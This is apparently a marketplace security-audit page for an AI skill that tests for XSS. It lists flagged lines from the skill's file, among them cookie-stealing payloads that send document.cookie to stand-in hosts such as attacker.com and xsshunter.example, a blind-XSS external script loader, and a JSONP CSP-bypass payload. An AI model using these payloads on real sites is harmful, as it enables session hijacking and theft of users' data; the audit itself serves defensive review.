testing-for-xss-vulnerabilities
Tests web applications for XSS vulnerabilities by injecting JavaScript payloads to identify security flaws and potential exploits.
Install this skill
or
45/100
Security score
The testing-for-xss-vulnerabilities skill was audited on Jun 13, 2026 and we found 7 security issues across 3 threat categories, including 2 critical. Review the findings below before installing.
Categories Tested
Security Issues
critical line 111
Eval function call - arbitrary code execution
SourceSKILL.md
| 111 | - `eval()`, `setTimeout()`, `setInterval()`, `Function()` |
critical line 122
Eval function call - arbitrary code execution
SourceSKILL.md
| 122 | - `unsafe-eval` allows eval() and similar functions |
low line 189
Fetch to external URL
SourceSKILL.md
| 189 | <img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)"> |
low line 99
External URL reference
SourceSKILL.md
| 99 | - Use XSS Hunter payloads (`"><script src=https://yourxsshunter.xss.ht></script>`) for blind stored XSS where the payload fires in an admin panel or internal tool you cannot directly access |
low line 125
External URL reference
SourceSKILL.md
| 125 | - **JSONP bypass**: If CSP allows a domain with JSONP endpoints, use `<script src="https://allowed-domain.com/jsonp?callback=alert(1)"></script>` |
low line 127
External URL reference
SourceSKILL.md
| 127 | - Session hijacking: `<script>new Image().src="https://attacker.com/steal?c="+document.cookie</script>` |
low line 189
External URL reference
SourceSKILL.md
| 189 | <img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)"> |
Scanned on Jun 13, 2026
View Security Dashboard